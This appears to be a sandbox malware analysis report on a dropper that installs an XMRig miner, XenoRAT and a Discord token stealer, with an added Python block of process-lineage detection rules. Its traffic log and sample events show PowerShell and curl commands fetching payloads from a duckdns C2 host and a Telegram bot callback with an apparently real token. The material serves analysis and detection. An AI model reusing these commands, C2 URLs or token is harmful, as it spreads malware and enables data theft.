Windows Analysis Report
SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe

Overview

General Information

Sample name: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe
Analysis ID: 1416947
MD5: 6614077c77a8182f0307a720071f2197
SHA1: 06a06a6d02ad281942ed8b6890f099be54275bb2
SHA256: 2935daeddeb1f505cea4ad368f598ab029942d91d831b71bbe4de5284c7a3132
Tags: exe

Detection

Discord Token Stealer, XenoRAT, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
Snort IDS alert for network traffic
Yara detected Discord Token Stealer
Yara detected XenoRAT
Yara detected Xmrig cryptocurrency miner
.NET source code contains potential unpacker
Found strings related to Crypto-Mining
Machine Learning detection for dropped file
Potential malicious VBS script found (suspicious strings)
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Potential Crypto Mining Activity
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses dynamic DNS services
Uses known network protocols on non-standard ports
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
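
Process-lineage checks, added here as an example and not part of the Joe Sandbox report. The rules approximate the Sigma and behaviour signatures listed above: a script host run from a user-writable folder, wscript starting PowerShell directly or through cmd (the report lists wscript.exe -> powershell.exe -> curl.exe), a PowerShell web download from a dynamic-DNS host on a high port, curl calling the Telegram bot API, a PE started from AppData\Roaming or ProgramData, and a process whose image carries a script extension although its content is a PE (the report attributes WinRAR SFX code and the sfxrar.pdb path to tmp.vbs). The events are constructed Sysmon-style process-creation records: the pids, the command-line text and the stage2.vbs name are assumptions, since the report only names the dropped files and the parent/child relations.

```python
"""Process-lineage rules for the execution chain in this report (added example)."""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
WEB_COMMANDS = re.compile(
    r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadfile|start-bitstransfer|net\.webclient", re.I)
# AppData\Local\Temp, AppData\Roaming and ProgramData: where this sample stages its payloads
USER_WRITABLE = re.compile(r"\\(appdata\\(local\\temp|roaming)|programdata)\\", re.I)
DYNDNS_OR_ODD_PORT = re.compile(r"\.(duckdns\.org|no-ip\.(org|com)|ddns\.net)\b|:\d{4,5}/", re.I)
TELEGRAM_BOT = re.compile(r"api\.telegram\.org/bot\d+:", re.I)


def image_name(path):
    """Lower-case file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events):
    """Return sorted (rule, pid) pairs for a list of process-creation events.

    Each event is a dict with pid, ppid, image and cmdline (Sysmon event 1
    fields); the parent is looked up by pid within the same list.
    """
    by_pid = {e["pid"]: e for e in events}
    hits = set()
    for e in events:
        img = image_name(e["image"])
        parent = by_pid.get(e["ppid"])
        pimg = image_name(parent["image"]) if parent else ""
        cl = e["cmdline"]

        # "Script Interpreter Execution From Suspicious Folder"
        if img in SCRIPT_HOSTS and USER_WRITABLE.search(cl):
            hits.add(("script_host_from_user_writable_dir", e["pid"]))

        # "Wscript starts Powershell (via cmd or directly)": allow one cmd.exe hop
        if img == "powershell.exe":
            anc = parent
            for _ in range(2):
                if anc is None:
                    break
                if image_name(anc["image"]) in SCRIPT_HOSTS:
                    hits.add(("wscript_spawns_powershell", e["pid"]))
                    break
                if image_name(anc["image"]) != "cmd.exe":
                    break
                anc = by_pid.get(anc["ppid"])

        # "Suspicious Invoke-WebRequest Execution" / "PowerShell Web Download"
        if img in SHELLS and WEB_COMMANDS.search(cl) and re.search(r"https?://", cl, re.I):
            hits.add(("shell_web_download", e["pid"]))
            if DYNDNS_OR_ODD_PORT.search(cl):
                hits.add(("download_from_dyndns_or_odd_port", e["pid"]))

        # "Usage Of Web Request Commands": curl.exe as a child of a shell or script host
        if img == "curl.exe" and pimg in SHELLS | SCRIPT_HOSTS:
            hits.add(("curl_child_of_shell", e["pid"]))
            if TELEGRAM_BOT.search(cl):
                hits.add(("telegram_bot_callback", e["pid"]))

        # "Suspicious execution chain": PE launched from a staging folder by a shell
        if img.endswith(".exe") and USER_WRITABLE.search(e["image"]) and pimg in SHELLS | SCRIPT_HOSTS:
            hits.add(("pe_run_from_user_writable_dir", e["pid"]))

        # "Execution of Suspicious File Type Extension": a process image named like a script
        if "." in img and not img.endswith((".exe", ".com", ".scr")):
            hits.add(("process_image_without_pe_extension", e["pid"]))
    return sorted(hits)


EVENTS = [  # constructed records; pids, command lines and stage2.vbs are assumptions
    {"pid": 100, "ppid": 1, "image": r"C:\Users\user\Desktop\sample.exe",
     "cmdline": r'"C:\Users\user\Desktop\sample.exe"'},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c "C:\Users\user\AppData\Local\Temp\down.bat"'},
    {"pid": 102, "ppid": 101, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "Invoke-WebRequest http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe -OutFile $env:APPDATA\6.exe"'},
    {"pid": 103, "ppid": 102, "image": r"C:\Users\user\AppData\Roaming\6.exe",
     "cmdline": r'"C:\Users\user\AppData\Roaming\6.exe"'},
    {"pid": 104, "ppid": 103, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\user\AppData\Local\Temp\stage2.vbs"'},
    {"pid": 105, "ppid": 104, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c "C:\Users\user\AppData\Local\Temp\ping.bat"'},
    {"pid": 106, "ppid": 105, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -NoProfile -Command "curl.exe https://api.telegram.org/bot000000000:AAExampleTokenPlaceholder/sendMessage?chat_id=1&text=Success"'},
    {"pid": 107, "ppid": 106, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r'curl.exe "https://api.telegram.org/bot000000000:AAExampleTokenPlaceholder/sendMessage?chat_id=1&text=Success"'},
    {"pid": 108, "ppid": 103, "image": r"C:\Users\user\AppData\Local\Temp\tmp.vbs",
     "cmdline": r'"C:\Users\user\AppData\Local\Temp\tmp.vbs"'},
]

if __name__ == "__main__":
    for rule, pid in evaluate(EVENTS):
        print(f"{pid}\t{rule}")
```

The rules key on parent/child relations and on where an image lives rather than on file names, so the same checks fire when the operator renames 1.exe through 6.exe; the last rule is the one that catches an SFX executed under a .vbs name, which a plain "script host" rule would miss.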

Classification

Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

AV Detection

Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://puredgb.duckdns.org:30000/hyar8z46/discord.exe Avira URL Cloud: Label: malware
Source: http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe Avira URL Cloud: Label: malware
Source: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe Avira URL Cloud: Label: malware
Source: http://puredgb.duckdns.org:30000 Avira URL Cloud: Label: malware
Source: http://puredgb.duckdns.org:30000/g0nv8z1z/creal.exe Avira URL Cloud: Label: malware
Source: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe4 Avira URL Cloud: Label: malware
Source: http://puredgb.duckdns.org:30000/6nif5f8r/address.exe Avira URL Cloud: Label: malware
Source: http://puredgb.duckdns.org Avira URL Cloud: Label: malware
Source: http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe Avira URL Cloud: Label: malware
Source: C:\ProgramData\Drivers\xmrig.exe Avira: detection malicious, Label: PUA/GM.Miner.ES
Source: puredgb.duckdns.org Virustotal: Detection: 8%
Source: http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe Virustotal: Detection: 7%
Source: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe Virustotal: Detection: 7%
Source: http://puredgb.duckdns.org:30000/hyar8z46/discord.exe Virustotal: Detection: 7%
Source: http://puredgb.duckdns.org:30000 Virustotal: Detection: 7%
Source: http://puredgb.duckdns.org:30000/6nif5f8r/address.exe Virustotal: Detection: 7%
Source: http://puredgb.duckdns.org Virustotal: Detection: 8%
Source: http://puredgb.duckdns.org:30000/g0nv8z1z/creal.exe Virustotal: Detection: 7%
Source: http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe Virustotal: Detection: 7%
Source: C:\ProgramData\Drivers\xmrig.exe ReversingLabs: Detection: 60%
Source: C:\ProgramData\Drivers\xmrig.exe Virustotal: Detection: 72%
Source: C:\Users\user\AppData\Roaming\1.exe ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Roaming\1.exe Virustotal: Detection: 27%
Source: C:\Users\user\AppData\Roaming\2.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Roaming\2.exe Virustotal: Detection: 66%
Source: C:\Users\user\AppData\Roaming\6.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\6.exe Virustotal: Detection: 57%
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Virustotal: Detection: 13%
Source: C:\ProgramData\Drivers\xmrig.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033F4244 CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,wcslen, 27_2_00007FF7033F4244
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033DE6A4 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 27_2_00007FF7033DE6A4
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033DF970 memset,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 27_2_00007FF7033DF970
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033DF0EC memset,_strdup,fopen,free,fseek,ftell,fread,fclose,free,fseek,malloc,strlen,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free, 27_2_00007FF7033DF0EC
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033F9E60 CryptHashData, 27_2_00007FF7033F9E60
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033F9E70 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 27_2_00007FF7033F9E70
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033F3D58 strlen,strlen,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, 27_2_00007FF7033F3D58
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033F9E14 CryptAcquireContextA,CryptCreateHash, 27_2_00007FF7033F9E14
Source: C:\Users\user\AppData\Roaming\1.exe Code function: -----BEGIN PUBLIC KEY----- 27_2_00007FF7033CCD8C
Source: 1.exe Binary or memory string: -----BEGIN PUBLIC KEY-----

Bitcoin Miner

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 21.0.xmrig.exe.7ff750e90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.6.exe.1b665fa72bc.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000002.3899504709.000001CD41524000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3899711006.000001CD42E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3899711006.000001CD42E52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3899633075.000001CD415A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3899504709.000001CD41520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.1543780130.00007FF751980000.00000008.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3899711006.000001CD42E7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.1543578231.00007FF75148F000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3899711006.000001CD42EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3899633075.000001CD415A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1507397894.000001B666732000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1507397894.000001B6665A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1507397894.000001B665FA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6.exe PID: 4272, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: conhost.exe PID: 3436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xmrig.exe PID: 1308, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\Drivers\process.bat, type: DROPPED
Source: Yara match File source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED
Source: 6.exe, 00000006.00000003.1507397894.000001B6665A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: stratum+ssl://randomx.xmrig.com:443
Source: 6.exe, 00000006.00000003.1507397894.000001B6665A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: cryptonight/0
Source: 6.exe, 00000006.00000003.1507397894.000001B6665A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: -o, --url=URL URL of mining server
Source: 6.exe, 00000006.00000003.1507397894.000001B6665A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: stratum+tcp://
Source: 6.exe, 00000006.00000003.1507397894.000001B6665A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: xmrig [OPTIONS]
Source: 6.exe, 00000006.00000003.1507397894.000001B666732000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: FileDescriptionXMRig miner.
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49713 version: TLS 1.2
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: 6.exe, 00000006.00000003.1507397894.000001B666732000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.6.dr
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe, tmp.vbs.27.dr, 6.exe.5.dr
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332A40CC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF7332A40CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332BADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF7332BADF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332CF900 FindFirstFileExA, 0_2_00007FF7332CF900
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C572ADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 6_2_00007FF6C572ADF0
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57140CC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 6_2_00007FF6C57140CC
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C573F900 FindFirstFileExA, 6_2_00007FF6C573F900
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033FA438 FindClose,abort,FindFirstFileExW,GetLastError, 27_2_00007FF7033FA438
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033FA4AC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort, 27_2_00007FF7033FA4AC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2CADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 31_2_00007FF75C2CADF0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2B40CC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 31_2_00007FF75C2B40CC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2DF900 FindFirstFileExA, 31_2_00007FF75C2DF900
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\System32\curl.exe

Networking

Source: Traffic Snort IDS: 2047928 ET TROJAN CoinMiner Domain in DNS Lookup (pool .supportxmr .com) 192.168.2.11:63049 -> 1.1.1.1:53
Source: unknown DNS query: name: puredgb.duckdns.org
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49725
Source: unknown DNS query: name: api.telegram.org
Source: global traffic TCP traffic: 192.168.2.11:49704 -> 200.165.100.3:30000
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View ASN Name: TelemarNorteLesteSABR TelemarNorteLesteSABR
Source: Joe Sandbox View JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: global traffic HTTP traffic detected: GET /ejr9e45s/xmr.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: puredgb.duckdns.org:30000 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /hyar8z46/discord.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: puredgb.duckdns.org:30000 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /gn1jv6sz/xeno.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: puredgb.duckdns.org:30000 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /6nif5f8r/address.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: puredgb.duckdns.org:30000 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /g0nv8z1z/creal.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: puredgb.duckdns.org:30000 | Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033DA5D8 recv,WSAGetLastError, 27_2_00007FF7033DA5D8
Source: global traffic HTTP traffic detected: GET /bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success HTTP/1.1 | Host: api.telegram.org | User-Agent: curl/7.83.1 | Accept: */*
Source: global traffic HTTP traffic detected: GET /ejr9e45s/xmr.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: puredgb.duckdns.org:30000 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /hyar8z46/discord.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: puredgb.duckdns.org:30000 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xmg8oxqt/ping.exe HTTP/1.1 | Host: puredgb.duckdns.org:30000 | User-Agent: curl/7.79.1 | Accept: */*
Source: global traffic HTTP traffic detected: GET /gn1jv6sz/xeno.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: puredgb.duckdns.org:30000 | Connection: Keep-Alive
